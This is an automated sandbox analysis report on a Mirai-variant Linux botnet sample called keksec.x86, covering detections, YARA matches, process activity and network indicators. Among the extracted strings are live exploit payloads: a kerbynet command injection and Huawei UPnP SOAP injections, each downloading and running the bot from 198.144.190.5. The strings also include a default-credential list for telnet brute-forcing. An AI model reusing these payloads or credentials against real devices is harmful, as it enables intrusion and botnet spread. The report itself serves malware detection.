Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report keksec.x86

Overview

General Information

Sample Name:keksec.x86
Analysis ID:326187
MD5:42b76b102f0efbc06b38166f2d61f311
SHA1:0e1f1c45741390535a26fed995cde59510727fa8
SHA256:449ba3c57d56a0a9cf3dfa3a5d7f3624641dfdad6d7d0b73ff8df7e61107e3f0

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Machine Learning detection for sample
Sample tries to persist itself using System V runlevels
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample contains symbols with suspicious names
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • keksec.x86 (PID: 4570, Parent: 4519, MD5: 42b76b102f0efbc06b38166f2d61f311) Arguments: /tmp/keksec.x86
  • upstart New Fork (PID: 4583, Parent: 3310)
  • sh (PID: 4583, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4585, Parent: 4583)
    • date (PID: 4585, Parent: 4583, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4593, Parent: 4583)
    • apport-checkreports (PID: 4593, Parent: 4583, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4610, Parent: 3310)
  • sh (PID: 4610, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4611, Parent: 4610)
    • date (PID: 4611, Parent: 4610, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4613, Parent: 4610)
    • apport-gtk (PID: 4613, Parent: 4610, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4640, Parent: 3310)
  • sh (PID: 4640, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4641, Parent: 4640)
    • date (PID: 4641, Parent: 4640, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4658, Parent: 4640)
    • apport-gtk (PID: 4658, Parent: 4640, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
keksec.x86MAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
  • 0x20c39:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x20fcb:$x2: /bin/busybox chmod 777 * /tmp/
  • 0x20998:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  • 0x20d68:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
keksec.x86JoeSecurity_Mirai_8Yara detected MiraiJoe Security

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: keksec.x86Virustotal: Detection: 61%Perma Link
    Source: keksec.x86Metadefender: Detection: 40%Perma Link
    Source: keksec.x86ReversingLabs: Detection: 65%
    Machine Learning detection for sampleShow sources
    Source: keksec.x86Joe Sandbox ML: detected

    Spreading:

    barindex
    Found strings indicative of a multi-platform dropperShow sources
    Source: keksec.x86String: GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' HTTP/1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: unknownTCP traffic detected without corresponding DNS query: 198.144.190.5
    Source: keksec.x86String found in binary or memory: http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/keksec
    Source: keksec.x86String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: keksec.x86String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: keksec.x86, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
    Source: Initial sampleString containing 'busybox' found: busybox
    Source: Initial sampleString containing 'busybox' found: AMP.txtBLACKNURSEFLUXVSESTOProotadminguestdefaultuserdaemonadmtelnetAdministratormg3500admin1ubntsupportpasswordZte521vizxv00000014567hi3518passadmin147ujMko0admin00000000<>klv1klv14oelinux1realtek111154321antslqzte9x15system1456888888ikwbjuantechxc35111111111service1454321techabc1switchmeinsmsmcadmin1456789014ankomerlinzlxx.seroginnamepassdvrdvsnvalidailedncorrecteniederrorgoodbyebadtimeoutshellusyboxrroroodbyebusyboxAK47/proc/cpuinfoBOGOMIPS:>%$#enterasswordTELNET %s:%d %s:%s
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 198.144.190.5 -l /tmp/.unstable -r /bins/keksec.mips64; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 198.144.190.5 -l /tmp/.unstable -r /bins/keksec.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 198.144.190.5 -l /tmp/.unstable -r /bins/keksec.mips64; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>nonce="", qop="auth"dslf-config:HuaweiHomeGateway:adminPOST:/ctrlt/DeviceUpgrade_1%s:%s:00000001:248d1a2560100669:auth:%sPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 198.144.190.5 -l /tmp/.unstable -r /bins/keksec.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>/proc//exe/status/proc/net/tcp/fd
    Source: Initial samplePotential command found: cd /root;rm -rf .bash_history
    Source: Initial samplePotential command found: cd /var/tmp; rm -f *
    Source: Initial samplePotential command found: GET /%s HTTP/1.1
    Source: Initial samplePotential command found: GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' HTTP/1.1
    Source: Initial samplePotential command found: echo -e '\x41\x4b\x34\x37'
    Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Source: Initial samplePotential command found: arch %s
    Source: ELF static info symbol of initial sampleName: huawei_scanner_pid
    Source: ELF static info symbol of initial sampleName: huawei_scanner_rawpkt
    Source: ELF static info symbol of initial sampleName: passwords
    Source: ELF static info symbol of initial sampleName: scanner_init
    Source: ELF static info symbol of initial sampleName: scanner_pid
    Source: ELF static info symbol of initial sampleName: scanner_rawpkt
    Source: ELF static info symbol of initial sampleName: usernames
    Source: keksec.x86, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
    Source: classification engineClassification label: mal76.spre.troj.linX86@0/3@0/0
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/memcpy.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/mempcpy.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/memset.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strchr.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strcmp.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strcpy.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strlen.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strpbrk.S
    Source: ELF static info symbol of initial sampleFILE: libc/string/x86_64/strspn.S
    Source: ELF static info symbol of initial sampleFILE: libc/sysdeps/linux/x86_64/crt1.S
    Source: ELF static info symbol of initial sampleFILE: libc/sysdeps/linux/x86_64/crti.S
    Source: ELF static info symbol of initial sampleFILE: libc/sysdeps/linux/x86_64/crtn.S
    Source: ELF static info symbol of initial sampleFILE: libc/sysdeps/linux/x86_64/vfork.S

    Persistence and Installation Behavior:

    barindex
    Sample tries to persist itself using System V runlevelsShow sources
    Source: /tmp/keksec.x86 (PID: 4572)File: /etc/rc.local
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/4573/exe
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/483/exe
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/496/exe
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/410/exe
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/437/exe
    Source: /tmp/keksec.x86 (PID: 4573)File opened: /proc/438/exe
    Source: /usr/share/apport/apport-gtk (PID: 4613)Queries kernel information via 'uname':
    Source: /usr/share/apport/apport-gtk (PID: 4658)Queries kernel information via 'uname':
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
    Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; CrOS x86_64 9592.96.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.114 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 535) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.4; HTC Desire 620 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
    Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
    Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter1At (Linux)1At (Linux)1Masquerading1OS Credential Dumping1Security Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 326187 Sample: keksec.x86 Startdate: 03/12/2020 Architecture: LINUX Score: 76 39 198.144.190.5, 23 AS-COLOCROSSINGUS United States 2->39 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected Mirai 2->47 49 2 other signatures 2->49 9 keksec.x86 2->9         started        11 upstart sh 2->11         started        13 upstart sh 2->13         started        15 upstart sh 2->15         started        signatures3 process4 process5 17 keksec.x86 9->17         started        19 sh date 11->19         started        21 sh apport-checkreports 11->21         started        23 sh date 13->23         started        25 sh apport-gtk 13->25         started        27 sh date 15->27         started        29 sh apport-gtk 15->29         started        process6 31 keksec.x86 17->31         started        file7 37 /etc/rc.local, ASCII 31->37 dropped 41 Sample tries to persist itself using System V runlevels 31->41 35 keksec.x86 31->35         started        signatures8 process9

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    keksec.x8662%VirustotalBrowse
    keksec.x8643%MetadefenderBrowse
    keksec.x8666%ReversingLabsLinux.Trojan.Gafgyt
    keksec.x86100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/keksec0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://198.144.190.5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://198.144.190.5/bins/kekseckeksec.x86true
    • Avira URL Cloud: safe
    		unknown
    http://schemas.xmlsoap.org/soap/encoding/keksec.x86false
      		high
      http://schemas.xmlsoap.org/soap/envelope/keksec.x86false
        		high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        198.144.190.5
        		unknownUnited States
        		36352AS-COLOCROSSINGUStrue

        General Information

        Joe Sandbox Version:31.0.0 Red Diamond
        Analysis ID:326187
        Start date:03.12.2020
        Start time:02:50:59
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 25s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:keksec.x86
        Cookbook file name:defaultlinuxfilecookbook.jbs
        Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
        Detection:MAL
        Classification:mal76.spre.troj.linX86@0/3@0/0
        Warnings:
        Show All
        • Excluded IPs from analysis (whitelisted): 91.189.92.41, 91.189.92.19, 91.189.92.39, 91.189.92.20, 91.189.92.40, 91.189.92.38
        • Excluded domains from analysis (whitelisted): api.snapcraft.io


        Runtime Messages

        Command:/tmp/keksec.x86
        Exit Code:0
        Exit Code Info:
        Killed:False
        Standard Output:
        bigB04t
        bigB04t
        Standard Error:

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        198.144.190.5Zk2alheRjs.exeGet hashmaliciousBrowse

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          AS-COLOCROSSINGUShttps://mbtaroll.tk/Login.php?sslchannel=true&sessionid=Jpvx93y8JgRFpwB2D6S76FwVGVH0eKmArD2DZdvffGrHIfGfryVp0vtNmvQdBq2eIn8T1temjHcqnoXVK9jYs24fgzW8Poywqnsx1f3VYySbZPlY2BXshxKsAiqv4FaDCoGet hashmaliciousBrowse
          • 23.95.217.2
          r.dllGet hashmaliciousBrowse
          • 192.227.170.162
          PI.xlsxGet hashmaliciousBrowse
          • 107.173.191.10
          New Order.xlsxGet hashmaliciousBrowse
          • 198.23.212.224
          POQQTYG.xlsxGet hashmaliciousBrowse
          • 198.23.212.224
          Payment _ Advice.xlsxGet hashmaliciousBrowse
          • 198.23.212.166
          Shipping Documents.xlsxGet hashmaliciousBrowse
          • 192.3.152.163
          Purchase Order 1508521.xlsxGet hashmaliciousBrowse
          • 216.170.114.70
          Purchase Order 1508521.xlsxGet hashmaliciousBrowse
          • 216.170.114.70
          PO. NO. 20201240001.xlsxGet hashmaliciousBrowse
          • 198.23.212.224
          b46rhYLlgB.exeGet hashmaliciousBrowse
          • 198.23.213.114
          PI-08351.xlsxGet hashmaliciousBrowse
          • 198.23.212.166
          AWB INVOICE.xlsxGet hashmaliciousBrowse
          • 216.170.126.121
          TT receipt.xlsxGet hashmaliciousBrowse
          • 216.170.114.70
          https://mbtaroll.tk/Login.php?sslchannel=true&sessionid=Jpvx93y8JgRFpwB2D6S76FwVGVH0eKmArD2DZdvffGrHIfGfryVp0vtNmvQdBq2eIn8T1temjHcqnoXVK9jYs24fgzW8Poywqnsx1f3VYySbZPlY2BXshxKsAiqv4FaDCoGet hashmaliciousBrowse
          • 23.95.217.2
          ORDER LIST.xlsxGet hashmaliciousBrowse
          • 198.23.212.224
          Order Specification.xlsxGet hashmaliciousBrowse
          • 198.23.212.166
          AWB INVOICE.xlsxGet hashmaliciousBrowse
          • 192.227.129.24
          ipr1tcEW.exeGet hashmaliciousBrowse
          • 23.95.13.157
          PI-08351.xlsxGet hashmaliciousBrowse
          • 198.23.212.166

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          /etc/rc.local
          Process:/tmp/keksec.x86
          File Type:ASCII text
          Category:dropped
          Size (bytes):18
          Entropy (8bit):3.725480556997868
          Encrypted:false
          SSDEEP:3:5q17Hv:Q7Hv
          MD5:1BB51BC856AE23CADF2DC97F3EEAD199
          SHA1:15B5F3664AA76CCC2366CEE1BB27F145342B7A05
          SHA-256:F2CC31CBE2B8C9E0D5DB3F3501946072661EEAD9A584912DBB4E680E368B8525
          SHA-512:05D3355636B70E069EA81D2A94A6D589A0A3FD4E95C3CBC6CCCA82CD9E5ACE9BB7E572C0E21FF38E1733F35CF53F1612BA8DED2CF111B564EFAFB34164E3A1F3
          Malicious:true
          Reputation:low
          Preview: "/tmp/keksec.x86".
          /var/crash/_usr_share_apport_apport-checkreports.1000.crash
          Process:/usr/share/apport/apport-checkreports
          File Type:ASCII text
          Category:dropped
          Size (bytes):14915
          Entropy (8bit):4.7153159999623515
          Encrypted:false
          SSDEEP:192:fdZElfzzFkL7PWuWB8fZOlw++EsfxITPIAhbM:FQhkmxS/EsfEi
          MD5:83D9804DF7A30C19ED45BB9A969C93F1
          SHA1:E685F0FB3233B506AA92DCC2A93670AD1846D78F
          SHA-256:0CEB95A3DEB18D490C4A30CE53EA84A124A92F63937E2615E840D5E2EFA23D26
          SHA-512:0AD2A2096286B61A03524A03E7A322607844346FEA7B68171F657DD72AD89D0709C6ABC26E4DBCB879E4EA2DEF292326B9B0C07CB7C229A8441A972398F0B914
          Malicious:false
          Reputation:low
          Preview: ProblemType: Crash.Date: Thu Dec 3 03:51:37 2020.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 02122000-0247a000 rw-p 00000000 00:00 0 [heap]. 7fec9137b000-7fec914fc000 rw-p 00000000 00:00 0 . 7fec914fc000-7fec91513000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fec91513000-7fec91712000 ---p 00017000 fc:0
          /var/crash/_usr_share_apport_apport-gtk.1000.crash
          Process:/usr/share/apport/apport-gtk
          File Type:ASCII text
          Category:dropped
          Size (bytes):47094
          Entropy (8bit):4.474432301920852
          Encrypted:false
          SSDEEP:384:PJ+HqPsJSAfs/l/X/z/J5HofXShLtbggxOkQToSnH+gPGk9K8uimEs4p:b/l/X/z/jHofCh1gg8HJPGk9K8uimU
          MD5:6BBAE4824C3C3D50D00EE10291825A03
          SHA1:D17E3AA63E633764597C86091704E32413282D4E
          SHA-256:080B2892E1F833834E39ABA6912F3F927ABB3EF862BE21C54B4451DC65506A9C
          SHA-512:1642A1AE600D0571F63F96985F944F3B23C490A343A7C5B7E43EEEC726CF88945E24DAFE32518CF3F7C728D3494DAA7F22104134D38DDF660002F8B97B1077BA
          Malicious:false
          Reputation:low
          Preview: ProblemType: Crash.Date: Thu Dec 3 03:51:37 2020.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 028e9000-02e09000 rw-p 00000000 00:00 0 [heap]. 7fc0ad041000-7fc0ad141000 rw-p 00000000 00:00 0 . 7fc0ad141000-7fc0ad158000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fc0ad158000-7fc0ad357000 ---p 00017000 fc:00 2382

          Static File Info

          General

          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
          Entropy (8bit):6.081422394269357
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:keksec.x86
          File size:189708
          MD5:42b76b102f0efbc06b38166f2d61f311
          SHA1:0e1f1c45741390535a26fed995cde59510727fa8
          SHA256:449ba3c57d56a0a9cf3dfa3a5d7f3624641dfdad6d7d0b73ff8df7e61107e3f0
          SHA512:47a0c2b7b58bf58583448ff63be484c343e3d70b46026f73e86d05df6f5bed907e09f78b8b951b2a9b641ecf7ae810681f626c6fe2f2c3456407c1ea13fb7d30
